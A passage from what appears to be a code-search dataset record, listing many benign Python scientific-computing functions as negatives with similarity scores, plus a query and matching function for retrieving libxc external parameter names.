p00 = 1-p10\n p11 = 1-p01\n for i in range(ns):\n #final state\n si = v[i,:]\n for j in range(i,ns):\n #initial state\n sj = v[j, :]\n #number of sites where 1->1 transition occurs, etc\n n11 = np.sum((si==1)*(sj==1))\n n10 = np.sum((si==1)*(sj==0))\n n01 = np.sum((si==0)*(sj==1))\n n00 = np.sum((si==0)*(sj==0))\n pi[i, j] = (p11**n11)*(p10**n10)*(p01**n01)*(p00**n00)\n pi[j,i] = (p11**n11)*(p10**n01)*(p01**n10)*(p00**n00)\n return pi", "def beta_model(r, s0, rc, beta, c):\n return s0 * np.power((1.0+(r/rc)**2), 0.5-3*beta) + c", "def make_coefficients(r, a, num_terms):\n\n\tnum_vars = 4\n\tcoeffs = np.zeros((num_vars, num_terms))\n\tfor i in range(num_vars):\n\t\tcoeffs[i, i+1] = r[i]\n\tcoeffs[0, [5, 6, 7, 8]] = a[0]\n\tcoeffs[1, [6, 9, 10, 11]] = a[1]\n\tcoeffs[2, [7, 10, 12, 13]] = a[2]\n\tcoeffs[3, [8, 11, 13, 
14]] = a[3]\n\t\n\treturn coeffs.ravel()", "def xi2fromCambPk(c,r):\n r = M.asarray(r)\n return N.trapz(c.k**3*c.pk*sf.j0(M.outer(r,c.k)),\n M.log(c.k))/2.0/M.pi**2", "def _read_coefficients(self):\r\n coeff = self._read_register(_BME280_REGISTER_DIG_T1, 24)\r\n coeff = list(struct.unpack('<HhhHhhhhhhhh', bytes(coeff)))\r\n coeff = [float(i) for i in coeff]\r\n self._temp_calib = coeff[:3]\r\n self._pressure_calib = coeff[3:]\r\n\r\n self._humidity_calib = [0]*6\r\n self._humidity_calib[0] = self._read_byte(_BME280_REGISTER_DIG_H1)\r\n coeff = self._read_register(_BME280_REGISTER_DIG_H2, 7)\r\n coeff = list(struct.unpack('<hBBBBb', bytes(coeff)))\r\n self._humidity_calib[1] = float(coeff[0])\r\n self._humidity_calib[2] = float(coeff[1])\r\n self._humidity_calib[3] = float((coeff[2] << 4) | (coeff[3] & 0xF))\r\n self._humidity_calib[4] = float((coeff[4] << 4) | (coeff[3] >> 4))\r\n self._humidity_calib[5] = float(coeff[5])", "def test_coefficients_tf_interface(self):\n import tensorflow as tf\n\n qnode = qml.QNode(self.circuit, self.dev)\n\n weights = tf.Variable([0.5, 0.2])\n\n obtained_result = coefficients(partial(qnode, weights), 2, 1)\n\n assert np.allclose(obtained_result, self.expected_result)", "def vnC(self):\n return np.array(\n [x for x in [self.nCx, self.nCy, self.nCz] if x is not None],\n dtype=int\n )", "def deriv2(self, model, v=None):\n\n k1, k2, k3 = self.coefficients\n if v is not None:\n v1, v2 = self.wire_map * v\n p1 = k1**2 * v1 + k2 * k1 * v2\n p2 = k2 * k1 * v1 + k2**2 * v2\n return np.r_[p1, p2]\n else:\n n = self.regularization_mesh.nC\n A = utils.sdiag(np.ones(n) * (k1**2))\n B = utils.sdiag(np.ones(n) * (k2**2))\n C = utils.sdiag(np.ones(n) * (k1 * k2))\n return sp.bmat([[A, C], [C, B]], format=\"csr\")", "def capenergy(C, V):\n energy = 1 / 2 * C * V ** 2\n return energy", "def A_coefficients_symmtop(v, bProlate=True):\n v=_sanitise_v(v)\n if bProlate:\n # Use z-dim.\n z2=np.square(v.take(-1,axis=-1))\n else:\n # Use x-dim.\n z2=np.square(v.take(0,axis=-1))\n onemz2=1-z2\n A0 = np.multiply( 3.0, np.multiply(z2,onemz2))\n A1 = np.multiply(0.75, np.square(onemz2))\n A2 = np.multiply(0.25, np.square(np.multiply(3,z2)-1))\n return np.stack((A0,A1,A2),axis=-1)\n #z2=v[2]*v[2]\n #A=np.zeros(3)\n #A[0]= 3.00*z2*(1-z2)\n #A[1]= 0.75*(1-z2)**2\n #A[2]= 0.25*(3*z2-1)**2\n #return A", "def beta_coef_(self):\n return pcr_beta_coef(self.regression, self.prcomp)", "def __init__( self, u = [ 1., 0., 0. ], v = [ 0., 1., 0. ], w = [ 0., 0., 1. ], coeff = 1. 
): \n\tdirect = [ u, v, w ]\n self.coeff = coeff\n\tself.direct = [ [ i*coeff for i in j ] for j in direct ]\n self.reciprocal_updated = False\n self.lattice_parameters_updated = False\n self.volume_updated = False\n self.get_lattice_parameters( u, v, w )\n self.get_volume( u, v, w )\n self.get_reciprocal_basis( u, v, w )", "def get_coeff(self):\n return bernoulli(self.degree+1) / factorial(self.degree + 1)", "def ric2bci(ric_vec, raan, inc, w, nu):\n\n # Checking for special orbit cases\n if np.isnan(w) == True:\n w = 0\n if np.isnan(raan) == True:\n raan = 0\n\n # Argument of Latitude\n u = w + nu\n\n bci_vec = R3(-raan) @ R1(-inc) @ R3(-u) @ ric_vec\n\n return bci_vec", "def return_coef(self):\n try:\n model_coef = self.cmodel.coef_\n except:\n model_coef = 'Model does not have a .coef_ attribute.'\n\n return model_coef", "def test_coefficients_jax_interface(self):\n import jax\n\n # Need to enable float64 support\n from jax.config import config\n\n remember = config.read(\"jax_enable_x64\")\n config.update(\"jax_enable_x64\", True)\n\n qnode = qml.QNode(self.circuit, self.dev, diff_method=\"parameter-shift\")\n\n weights = jax.numpy.array([0.5, 0.2])\n\n obtained_result = coefficients(partial(qnode, weights), 2, 1)\n\n assert np.allclose(obtained_result, self.expected_result)\n\n config.update(\"jax_enable_x64\", remember)", "def calculate_bic(R, u_t, inverse_transform_test, model_list, x_nodes):\n\n evidence_list = [] # model evidence, i.e. BIC for each model\n for i_model, model in enumerate(model_list):\n k = model.terms\n if k == 0: # does not make sense to compute model without any terms\n continue\n # coefficients are normed and correspond to normed R (if norming in preconditioning applies)\n weights = model.coefficients # unnormed coefficients from training set\n # norm weights found in training to correspond to norming in test data, which is different in general\n weights = np.dot(np.linalg.inv(inverse_transform_test), weights)\n\n # n_eff:\n n = x_nodes # presumption\n\n y_predict = np.dot(R, weights) # predicted u_t from training weights\n err_vect = u_t.squeeze() - y_predict.transpose() # residual vector\n err_vect = err_vect.transpose()\n s_2 = np.dot(err_vect.transpose(), err_vect) # sum of squared residuals\n # BIC:\n log_evidence_BIC = -(n / 2) * np.log(s_2) - (k / 2) * np.log(n)\n\n evidence_list.append([i_model, log_evidence_BIC])\n return evidence_list", "def brownian_coefficients(\n temperature,\n dt,\n friction,\n masses):\n fscale = dt/friction\n kT = BOLTZ * temperature\n\n invMasses = 1.0/masses\n sqrtInvMasses = np.sqrt(invMasses)\n\n nscale = np.sqrt(2.0*kT*dt/friction);\n\n ca = 0.0\n cb = fscale*invMasses\n cc = nscale*sqrtInvMasses\n return ca, cb, cc", "def b12(self,k1,k2,c):\n return 2.0/3.0*(1-self.mu)*c.pkInterp(k1)*c.pkInterp(k2)", "def generateCoefficients (self):\n\t\tself.ws = []\n\t\tif not self.sine:\n\t\t\tself.bs = []\n\t\tmean = np.zeros(self.dim)\n\t\tcov = np.eye(self.dim)*(2*self.gammak)\n\n\t\tif self.sine:\n\t\t\tfor _ in range(self.rn):\n\t\t\t\tself.ws.append(nr.multivariate_normal(mean, cov))\n\t\telse:\n\t\t\tfor _ in range(self.rn):\n\t\t\t\tself.ws.append(nr.multivariate_normal(mean, cov))\n\t\t\t\tself.bs.append(nr.uniform(0.0, 2*np.pi))", "def cr_v(self, v, k):\n\n return self.cr(v[:, 0], v[:, 1], v[:, 2], k).T", "def calculate_coefficients(self):\n for i in range(0, self.nz):\n zno = i * self.dz\n self.z[0][i] = zno\n plot_eccentricity_error = False\n position = -1\n for j in range(0, self.ntheta):\n # fmt: off\n self.gama[i][j] = 
j * self.dtheta + (np.pi - self.beta)\n [radius_external, self.xre[i][j], self.yre[i][j]] = \\\n self.external_radius_function(self.gama[i][j])\n [radius_internal, self.xri[i][j], self.yri[i][j]] = \\\n self.internal_radius_function(zno, self.gama[i][j])\n self.re[i][j] = radius_external\n self.ri[i][j] = radius_internal\n\n w = self.omega * self.ri[i][j]\n\n k = (self.re[i][j] ** 2 * (np.log(self.re[i][j]) - 1 / 2) - self.ri[i][j] ** 2 *\n (np.log(self.ri[i][j]) - 1 / 2)) / (self.ri[i][j] ** 2 - self.re[i][j] ** 2)\n\n self.c1[i][j] = (1 / (4 * self.viscosity)) * ((self.re[i][j] ** 2 * np.log(self.re[i][j]) -\n self.ri[i][j] ** 2 * np.log(self.ri[i][j]) +\n (self.re[i][j] ** 2 - self.ri[i][j] ** 2) *\n (k - 1)) - 2 * self.re[i][j] ** 2 * (\n (np.log(self.re[i][j]) + k - 1 / 2) * np.log(\n self.re[i][j] / self.ri[i][j])))\n\n self.c2[i][j] = (- self.ri[i][j] ** 2) / (8 * self.viscosity) * \\\n ((self.re[i][j] ** 2 - self.ri[i][j] ** 2 -\n (self.re[i][j] ** 4 - self.ri[i][j] ** 4) /\n (2 * self.ri[i][j] ** 2)) +\n ((self.re[i][j] ** 2 - self.ri[i][j] ** 2) /\n (self.ri[i][j] ** 2 *\n np.log(self.re[i][j] / self.ri[i][j]))) *\n (self.re[i][j] ** 2 * np.log(self.re[i][j] / self.ri[i][j]) -\n (self.re[i][j] ** 2 - self.ri[i][j] ** 2) / 2))\n\n self.c0w[i][j] = (- w * self.ri[i][j] *\n (np.log(self.re[i][j] / self.ri[i][j]) *\n (1 + (self.ri[i][j] ** 2) / (self.re[i][j] ** 2 - self.ri[i][j] ** 2)) - 1 / 2))\n # fmt: on\n if not plot_eccentricity_error:\n if abs(self.xri[i][j]) > abs(self.xre[i][j]) or abs(\n self.yri[i][j]\n ) > abs(self.yre[i][j]):\n plot_eccentricity_error = True\n position = i\n if plot_eccentricity_error:\n self.plot_eccentricity(position)\n sys.exit(\n \"Error: The given parameters create a rotor that is not inside the stator. \"\n \"Check the plotted figure and fix accordingly.\"\n )", "def getVs(self, Vp, residual, beta):\n return Vp + beta*residual", "def model(a, t, D, m):\n xprime = a[1] # x' = v\n vprime = -D*a[0]/m # v' = -D*x/m\n return [xprime, vprime]", "def _create_coefficients(self) -> npt.NDArray[np.complex_ | np.float_]:\n _logger.info(\n f\"Slepian eigenvalue {self.rank}: \"\n f\"{self.mesh_slepian.slepian_eigenvalues[self.rank]:e}\",\n )\n s_p_i = self.mesh_slepian.slepian_functions[self.rank]\n return sleplet.slepian_methods.slepian_mesh_forward(\n self.mesh_slepian,\n u_i=s_p_i,\n )", "def coeff_display_M202(Nstar=1,seeing=[0.9,0.,0.],npix=npix,zenith=0,filter='r', theta=0., phi=0,corrector='corrector',x=0.,y=0.,z=0.,zernike_max_order=20,regular=False):\n hdu = genImgVallCCD(Nstar=Nstar,seeing=seeing,npix=npix,zenith=zenith,filter=filter, theta=theta,phi=phi, corrector=corrector,x=x,y=y,z=z,regular=regular)\n nn = len(hdu)\n data = []\n colnames = ['x','y','M20','M22','M31','M33']\n for hdui in hdu[1:]:\n Nobj = hdui.data.shape[0]\n M20=np.zeros(Nobj)\n M22=np.zeros(Nobj).astype(complex)\n M31=np.zeros(Nobj).astype(complex)\n M33=np.zeros(Nobj).astype(complex)\n for i in range(Nobj):\n img = hdui.data[i][4:].reshape(npix,npix)\n img = rebin(img,(40,40))\n M20,M22,M31,M33=complexMoments(data=img,sigma=4.)\n x=hdui.header['ccdXcen']\n y=hdui.header['ccdYcen']\n data.append([x,y,np.median(M20), np.median(M22), np.median(M31), np.median(M33)])\n data=np.array(data) \n betaAll=[]\n betaErrAll=[]\n R2adjAll=[]\n beta,betaErr,R2_adj,fitted = zernikeFit(data[:,0].real,data[:,1].real,data[:,2].real,max_order=zernike_max_order)\n betaAll.append(beta)\n betaErrAll.append(betaErr)\n R2adjAll.append(R2_adj)\n for i in range(3,6):\n beta,betaErr,R2_adj,fitted = 
zernikeFit(data[:,0].real,data[:,1].real,data[:,i].real,max_order=zernike_max_order)\n betaAll.append(beta)\n betaErrAll.append(betaErr)\n R2adjAll.append(R2_adj)\n beta,betaErr,R2_adj,fitted = zernikeFit(data[:,0].real,data[:,1].real,data[:,i].imag,max_order=zernike_max_order)\n betaAll.append(beta)\n betaErrAll.append(betaErr)\n R2adjAll.append(R2_adj)\n betaAll = np.array(betaAll)\n betaErrAll = np.array(betaErrAll)\n R2adjAll = np.array(R2adjAll)\n ind = np.arange(len(betaAll[0]))\n momname = ('M20','M22.Real','M22.imag','M31.real','M31.imag','M33.real','M33.imag')\n fmtarr = ['bo-','ro-','go-','co-','mo-','yo-','ko-']\n pl.figure(figsize=(17,7))\n for i in range(3):\n pl.subplot(4,1,i+1)\n pl.errorbar(ind[1:],betaAll[i][1:],yerr = betaErrAll[i][1:],fmt=fmtarr[i])\n if i == 0:\n pl.title('x: '+str(hdu[0].header['x'])+' y: '+str(hdu[0].header['y'])+' z: '+str(hdu[0].header['z'])+' tilt: '+str(hdu[0].header['theta'])+' fwhm: '+str(hdu[0].header['s_fwhm'])+' e1: '+str(hdu[0].header['e1'])+' e2: '+str(hdu[0].header['e2']))\n pl.grid()\n pl.xlim(-1,len(betaAll[i])+1)\n pl.ylim(min(betaAll[i][1:])-0.5,max(betaAll[i][1:])+0.5)\n #pl.ylim(-0.1,0.1)\n pl.xticks(ind,('','','','','','','','','','','','','','','','','','','',''))\n pl.ylabel(momname[i])\n pl.xticks(ind,('Piston','Tip','Tilt','Astignism','Defocus','Astignism','Trefoil','Coma','Coma','Trefoil','Ashtray','Astigm.5th','Spherical','Astigm.5th','Ashtray','16','17','18','19','20'),rotation=90)\n pl.xlabel('Zernike Coefficients')\n return betaAll,betaErrAll", "def beta_inversion(self) -> 'Nparray':\n return numpy.flip(self.coeff, 1)", "def svm():", "def acoeff(self):\n return np.dot(self.mmi,np.dot(self.mmatrix.T,self.bvec))", "def coeff_display(Nstar=1,seeing=[0.9,0.,0.],npix=npix,zenith=0,filter='r', theta=0., phi=0,corrector='corrector',x=0.,y=0.,z=0.,zernike_max_order=20,regular=False):\n hdu = genImgVallCCD(Nstar=Nstar,seeing=seeing,npix=npix,zenith=zenith,filter=filter, theta=theta,phi=phi, corrector=corrector,x=x,y=y,z=z,regular=regular)\n nn = len(hdu)\n data = []\n colnames = ['x','y','M20','M22','M31','M33']\n for hdui in hdu[1:]:\n Nobj = hdui.data.shape[0]\n M20=np.zeros(Nobj)\n M22=np.zeros(Nobj).astype(complex)\n M31=np.zeros(Nobj).astype(complex)\n M33=np.zeros(Nobj).astype(complex)\n for i in range(Nobj):\n M20[i],M22[i],M31[i],M33[i]=complexMoments(data=hdui.data[i][4:].reshape(npix,npix),sigma=2.)\n x=hdui.header['ccdXcen']\n y=hdui.header['ccdYcen']\n data.append([x,y,np.median(M20), np.median(M22), np.median(M31), np.median(M33)])\n data=np.array(data)\n betaAll=[]\n betaErrAll=[]\n R2adjAll=[]\n beta,betaErr,R2_adj = zernikeFit(data[:,0].real,data[:,1].real,data[:,2].real,max_order=zernike_max_order)\n betaAll.append(beta)\n betaErrAll.append(betaErr)\n R2adjAll.append(R2_adj)\n for i in range(3,6):\n beta,betaErr,R2_adj = zernikeFit(data[:,0].real,data[:,1].real,data[:,i].real,max_order=zernike_max_order)\n betaAll.append(beta)\n betaErrAll.append(betaErr)\n R2adjAll.append(R2_adj)\n beta,betaErr,R2_adj = zernikeFit(data[:,0].real,data[:,1].real,data[:,i].imag,max_order=zernike_max_order)\n betaAll.append(beta)\n betaErrAll.append(betaErr)\n R2adjAll.append(R2_adj)\n betaAll = np.array(betaAll)\n betaErrAll = np.array(betaErrAll)\n R2adjAll = np.array(R2adjAll)\n ind = np.arange(len(betaAll[0]))\n momname = ('M20','M22.Real','M22.imag','M31.real','M31.imag','M33.real','M33.imag')\n fmtarr = ['bo-','ro-','go-','co-','mo-','yo-','ko-']\n pl.figure(figsize=(17,13))\n for i in range(7):\n pl.subplot(7,1,i+1)\n 
pl.errorbar(ind,betaAll[i],yerr = betaErrAll[i],fmt=fmtarr[i])\n if i == 0:\n pl.title('x: '+str(hdu[0].header['x'])+' y: '+str(hdu[0].header['y'])+' z: '+str(hdu[0].header['z'])+' tilt: '+str(hdu[0].header['theta'])+' fwhm: '+str(hdu[0].header['s_fwhm'])+' e1: '+str(hdu[0].header['e1'])+' e2: '+str(hdu[0].header['e2']))\n pl.grid()\n pl.xlim(-1,21)\n if i ==0:\n pl.ylim(-10,65)\n elif i ==1:\n pl.ylim(-5,6)\n elif i ==2:\n pl.ylim(-5,6)\n elif i == 3:\n pl.ylim(-0.1,0.1)\n elif i == 4:\n pl.ylim(-0.1,0.1)\n elif i ==5:\n pl.ylim(-100,100)\n elif i == 6:\n pl.ylim(-100,100)\n pl.xticks(ind,('','','','','','','','','','','','','','','','','','','',''))\n pl.ylabel(momname[i])\n pl.xticks(ind,('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20'))\n pl.xlabel('Zernike Coefficients')\n return betaAll,betaErrAll", "def bayesian(R, v, m, C):\n\n # Convert to floating point numbers\n R = float(R)\n v = float(v)\n m = float(m)\n C = float(C)\n\n return ((v / (v + m)) * R + (m / (v + m)) * C)", "def test_coefficient_orders(self):\n for i in range(2, 5):\n spec = {2*j: 0 for j in range(i)}\n bcs_ref = BoundaryConditions(spec, 2*i-2)\n bcs_main = BoundaryConditions(spec, 2*i)\n\n coeffs_ref = get_ext_coeffs(bcs_ref)[i-1]\n coeffs_main = get_ext_coeffs(bcs_main)[i-1]\n\n assert coeffs_ref == coeffs_main", "def compCGP_C(M):\n # we store the coedd as a lower triangular matrix\n # random polynomial coefficients\n c = 0.5 * np.random.uniform(-1.0, -0.45, size=(M + 1, M + 1)) +\\\n 0.5 * np.random.uniform(0.45, 1.0, size=(M + 1, M + 1))\n for i in np.arange(M + 1):\n c[i, :] /= 2**(np.arange(M + 1) + i)\n c /= 1.5\n c = np.tril(c)\n c[0, 0] = 0\n c[1, 0] = 0\n c[1, 1] = 1\n\n return c", "def trans_coeffs(file_name, exci_info):\n ntrans_a = exci_info.nocc_a * exci_info.nvirt_a\n ntrans_b = exci_info.nocc_b * exci_info.nvirt_b\n ntrans_tot = ntrans_a + ntrans_b\n\n raw_array = read_gauss_rwf(file_name)\n # list of transition coefficients. 
Each element is 1 excitation\n exci_coeffs_add = []\n exci_coeffs_sub = []\n\n for i_ex in range(exci_info.nex):\n a_start = i_ex * ntrans_tot + 12\n a_end = i_ex * ntrans_tot + ntrans_a + 12\n b_start = i_ex * ntrans_tot + ntrans_a + 12\n b_end = i_ex * ntrans_tot + ntrans_tot + 12\n\n trans_a = raw_array[a_start:a_end]\n trans_b = raw_array[b_start:b_end]\n\n exci_coeffs_add.append(np.array([trans_a,trans_b]))\n\n for i_ex in range(exci_info.nex):\n n_skip = int((len(raw_array)-12-exci_info.nex)/2)\n a_start = i_ex * ntrans_tot + 12 + n_skip\n a_end = i_ex * ntrans_tot + ntrans_a + 12 + n_skip\n b_start = i_ex * ntrans_tot + ntrans_a + 12 + n_skip\n b_end = i_ex * ntrans_tot + ntrans_tot + 12 + n_skip\n\n trans_a = raw_array[a_start:a_end]\n trans_b = raw_array[b_start:b_end]\n\n exci_coeffs_sub.append(np.array([trans_a,trans_b]))\n\n ket_x_lis = []\n ket_y_lis = []\n\n for i,j in zip(exci_coeffs_add,exci_coeffs_sub):\n ket_x_lis.append((i[0]+j[0])/2)\n ket_y_lis.append((i[0]-j[0])/2)\n\n ket_x = np.array(ket_x_lis)\n ket_y = np.array(ket_y_lis)\n\n return ket_x, ket_y", "def calculate_condensate_params(Rvi, Bgi):\n\n Rsi = 1 / Rvi\n Boi = Rsi * Bgi\n\n return(Rsi, Boi)", "def absorption_coeffs(self):\n return self.energy_absorption[\"coeffs\"]", "def print_coeffs(f,model,v_coeff=None,w_coeff=None,wrad_coeff=None,timezero=None,final=False):\n if model.ncosF>0:\n if final: print >>f,\"===== final v_coeff =====\"\n else: print >>f,\"===== v_coeff =====\"\n for i,val in enumerate(v_coeff):\n print >>f, \"%8d %13.5e\" %(i,val)\n if model.ncosD>0:\n if final: print >>f,\"===== final w_coeff =====\"\n else: print >>f,\"===== w_coeff =====\"\n print >>f, \"%8d %13.5e\" %(0,w_coeff[0]+model.wunit) # only the first needs to be shifted\n for i,val in enumerate(w_coeff[1:]):\n print >>f, \"%8d %13.5e\" %(i+1,val)\n if timezero is not None:\n if final: print >>f,\"===== final timezero =====\"\n else: print >>f,\"===== timezero =====\"\n print >>f, \"%13.5e\" %(timezero)\n if wrad_coeff is not None:\n if model.ncosDrad > 0:\n if final: print >>f,\"===== final wrad_coeff =====\"\n else: print >>f,\"===== wrad_coeff =====\"\n print >>f, \"%8d %13.5e\" %(0,wrad_coeff[0]+model.wradunit) # only the first needs to be shifted\n for i,val in enumerate(wrad_coeff[1:]):\n print >>f, \"%8d %13.5e\" %(i+1,val)\n print >>f, \"=\"*10", "def algorithm_2_20_vector(p, t, c, x):\n\n mu = index(x, t)\n t = np.array(t, dtype=np.float64)\n c = np.array(c[mu - p:mu + 1], dtype=np.float64)\n\n for i in range(0, p):\n k = p - i\n t1 = t[mu - k + 1:mu + 1]\n t2 = t[mu + 1:mu + k + 1]\n omega = np.divide((x - t1), (t2 - t1))\n c = (1 - omega) * c[:-1] + omega * c[1:]\n return c", "def bjs(l, c):\n if len(l) == 4:\n l = mbvector(l)\n elif len(l) == 3:\n pass\n else:\n return 0\n v = np.array([1, pi, e])\n r = l / np.linalg.norm(l)\n m = np.cross(r, v)\n n = np.cross(r, m)\n m = m / np.linalg.norm(m)\n n = n / np.linalg.norm(n)\n w = np.arange(0, 2 * pi, 0.001)\n s = len(w)\n\n mm = vect_contract(m, c, m)\n mn = vect_contract(m, c, n)\n nm = vect_contract(n, c, m)\n nn0 = vect_contract(n, c, n)\n nn = np.linalg.inv(nn0)\n\n val1 = mm - np.dot(np.dot(mn, nn), nm)\n R = BB = np.zeros(shape=(3, 3))\n for i in range(1, s):\n t = 1 - cos(w[i])\n CO = cos(w[i])\n SI = sin(w[i])\n R[0, 0] = t * r[0] ** 2 + CO\n R[0, 1] = t * r[0] * r[1] - SI * r[2]\n R[0, 2] = t * r[0] * r[2] + SI * r[1]\n R[1, 0] = t * r[0] * r[1] + SI * r[2]\n R[1, 1] = t * r[1] ** 2 + CO\n R[1, 2] = t * r[1] * r[2] - SI * r[0]\n R[2, 0] = t * r[0] * r[2] - SI * 
r[1]\n R[2, 1] = t * r[1] * r[2] + SI * r[0]\n R[2, 2] = t * r[2] ** 2 + CO\n\n mr = np.dot(R, np.transpose(m))\n nr = np.dot(R, np.transpose(n))\n\n mm = vect_contract(mr, c, mr)\n mn = vect_contract(mr, c, nr)\n nm = vect_contract(nr, c, mr)\n nn0 = vect_contract(nr, c, nr)\n nn = np.linalg.inv(nn0)\n val2 = mm - np.dot(np.dot(mn, nn), nm)\n BB = BB + 0.5 * (val2 + val1) * (w[i] - w[i - 1])\n val1 = val2\n B = BB / (8 * pi**2)\n return B", "def _fv(self):\n return self.beta * (self.x ** self.c)" ]
[ "0.65958256", "0.65501094", "0.6504454", "0.6486117", "0.6194975", "0.61420995", "0.60554177", "0.60554177", "0.60174334", "0.5979773", "0.59653145", "0.59653145", "0.59482545", "0.59466475", "0.5945674", "0.59176135", "0.59019333", "0.58690476", "0.58312464", "0.582763", "0.57844913", "0.571731", "0.5712013", "0.5661301", "0.5642825", "0.5633623", "0.56261474", "0.5612051", "0.5610591", "0.55930054", "0.55260396", "0.55250525", "0.5514898", "0.5506186", "0.5503836", "0.549316", "0.5476961", "0.5455431", "0.54411614", "0.54320866", "0.54217637", "0.541903", "0.5414923", "0.5386276", "0.5385196", "0.5374794", "0.5372979", "0.5372545", "0.53668606", "0.5366216", "0.5365757", "0.53634983", "0.5362128", "0.5360005", "0.5353212", "0.533765", "0.53314286", "0.5313666", "0.53020734", "0.53020734", "0.53014284", "0.5270166", "0.52665854", "0.525221", "0.5247895", "0.524169", "0.5240335", "0.5222525", "0.5222067", "0.52106845", "0.5208695", "0.52059066", "0.51886404", "0.517392", "0.5170814", "0.5166013", "0.51531535", "0.51508117", "0.5130713", "0.51223207", "0.51109415", "0.51093626", "0.5104825", "0.509806", "0.50969577", "0.5096949", "0.5095664", "0.5090119", "0.5081798", "0.50726724", "0.5067863", "0.50651056", "0.506367", "0.5062842", "0.5059351", "0.5057907", "0.505522", "0.50489205", "0.50418717", "0.5038286" ]
0.83470845
0
Gets the names of all external parameters
def get_ext_param_names(self): num_param = core.xc_func_info_get_n_ext_params(self.xc_func_info) ret = [] for p in range(num_param): tmp = core.xc_func_info_get_ext_params_name(self.xc_func_info, p) ret.append(tmp.decode("UTF-8")) return ret
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parameter_names(self) -> List[str]:", "def get_param_names(self):\n return list(self.params.keys())", "def parameter_names(self) -> list:\n parameters = []\n parameters.extend(self.properties.parameter_names)\n return parameters", "def parameters_names(cls):\n return cls._Parameters._fields", "def _get_param_names(self):\r\n return sorted([p\r\n for p in self.__dict__\r\n if p != 'additional_args'])", "def get_ext_param_descriptions(self):\n num_param = core.xc_func_info_get_n_ext_params(self.xc_func_info)\n\n ret = []\n for p in range(num_param):\n tmp = core.xc_func_info_get_ext_params_description(self.xc_func_info, p)\n ret.append(tmp.decode(\"UTF-8\"))\n\n return ret", "def get_param_names(hf):\n parameters = get_params(hf)\n return [p.name for p in parameters]", "def parameterNames(self, p_int): # real signature unknown; restored from __doc__\n return []", "def _external_params():\n list_ext_params = []\n list_ext_params.append(\n (hoomd.md.external.field.Periodic, \"params\",\n list([dict(A=1.5, i=1, w=3.5, p=5),\n dict(A=10, i=0, w=3.4, p=2)]), _evaluate_periodic))\n list_ext_params.append(\n (hoomd.md.external.field.Electric, \"E\", list([\n (1, 0, 0),\n (0, 2, 0),\n ]), _evaluate_electric))\n return list_ext_params", "def get_parameter_names(self):\n parNames = []\n # for par in self.variables: # TODO: LIKELY A BUG! DOES THE SAME AS get_variable_names()\n for par in self.parameters: # TRYING TO SOLVE THE ISSUE\n # EstimationVariable\n parNames.append(par.name)\n return parNames", "def parameters(self):\n return [p for _, a in vars(self).items() for p in self._params(a)]", "def get_hyperparameter_names():\n params = ['mu', 'nu', 'r', 's']\n return params", "def parameters(self):\n return []", "def _get_fitted_param_names(self):\n return self._fitted_param_names", "def get_paramnames_list(self):\n # TODO include syselem?\n\n query = \"SELECT NAME FROM %s\" % self.__schema\n with self.__connection.cursor() as cursor:\n cursor.execute(query)\n result = cursor.fetchall()\n return [val['NAME'] for val in result]", "def get_params_list():\n return common.QOL_PARAMS", "def get_layer_var_names(self):\n return(self.params)", "def _get_parameters(self) -> list:\n return self.parameters", "def get_params(self):\n return []", "def get_str_param_names(self):\n # Exclude self.api and self.names from the command string\n return self.get_attribute_names(FormattedParameter)", "def get_parameters_list(self):\n return self.description[\"config\"][\"values\"].keys()", "def get_mandatory_param_names(self):\n all_names = self.params.keys()\n return [name for name in all_names \n if not self.params[name].is_optional]", "def parameter_names(self):\n return [x for x in self.transformations.values() if isinstance(x, str)]", "def variables_used (self) :\r\n\t\treturn [i[0] for i in self.parameters]", "def keys(self):\n return self.params.keys()", "def get_resource_params():\n return Parameter.list()", "def parameters_list(self):\n return [getattr(self.parameters, p) for p in self.parameters_names()]", "def get_required_parameters(self) -> list:\n results = []\n if self.no_params or self.params_optional:\n return []\n else:\n for parameter, parameter_details in self.parameters.items():\n # Fixing issue #92\n # if parameter == \"effect\":\n # continue\n if not parameter_details.default_value:\n results.append(parameter_details.name)\n return results", "def param_names(\n self, *, include_tp: bool = False, include_gq: bool = False\n ) -> List[str]:\n return (\n self._param_names(self.model, 
int(include_tp), int(include_gq))\n .decode(\"utf-8\")\n .split(\",\")\n )", "def getParameters(self): #$NON-NLS-1$\r", "def names(self):\n result = []\n result.extend(self.positional_arguments)\n if self.arbitary_positional_arguments is not None:\n result.append(self.arbitary_positional_arguments)\n if self.arbitary_keyword_arguments is not None:\n result.append(self.arbitary_keyword_arguments)\n result.extend(self.keyword_arguments)\n return result", "def parameter_names(self):\n raise NotImplementedError(\"the parameter_names property should \"\n \"be defined in the Estimator sub-class\")", "def parameters(self):\n return [term.parameter for term in self.terms]", "def get_all_component_parameters(self) -> Dict[str, Any]:\n return self._node[\"app_data\"][\"component_parameters\"]", "def get_model_parameter_names():\n params = ['mu', 'rho']\n return params", "def names(self) -> List[str]:\n return sorted(self.hyperparams)", "def _get_param_names(self):\n temp_params = {'function': self.function, 'target': self.target}\n\n temp_params.update(self.kwargs)\n\n return temp_params", "def get_all_param_values(layer):\n params = get_all_params(layer)\n return [p.get_value() for p in params]", "def param(self):\n return []", "def param(self):\n return []", "def param(self):\r\n\r\n return []", "def param_unc_names(self) -> List[str]:\n return self._param_unc_names(self.model).decode(\"utf-8\").split(\",\")", "def get_params(self):\n return list(self.params.values())", "def list_params(ns):\n try:\n ns = make_global_ns(ns)\n names = get_param_server().getParamNames()\n names.sort()\n return [n for n in names if n.startswith(ns)]\n except socket.error:\n raise RosParamIOException(\"Unable to communicate with master!\")", "def get_params(self):\n pass", "def parameter_names(self, add_self=False, adjust_for_printing=False, recursive=True):\n if adjust_for_printing: adjust = lambda x: adjust_name_for_printing(x)\n else: adjust = lambda x: x\n if recursive: names = [xi for x in self.parameters for xi in x.parameter_names(add_self=True, adjust_for_printing=adjust_for_printing)]\n else: names = [adjust(x.name) for x in self.parameters]\n if add_self: names = map(lambda x: adjust(self.name) + \".\" + x, names)\n return names", "def _get_params(self):\r\n return self.k._get_params()", "def get_params(self):", "def param(self):\r\n return []", "def parameters(self):\n return self.vars", "def parameters(self):\n return self._params", "def getListOfLocalParameters(self, *args):\n return _libsbml.KineticLaw_getListOfLocalParameters(self, *args)", "def get_all_params(layer):\n layers = get_all_layers(layer)\n params = sum([l.get_params() for l in layers], [])\n return utils.unique(params)", "def potential_parameters(cls):\n return [\"k\", \"periodicity\", \"phase\", \"idivf\"]", "def potential_parameters(cls):\n 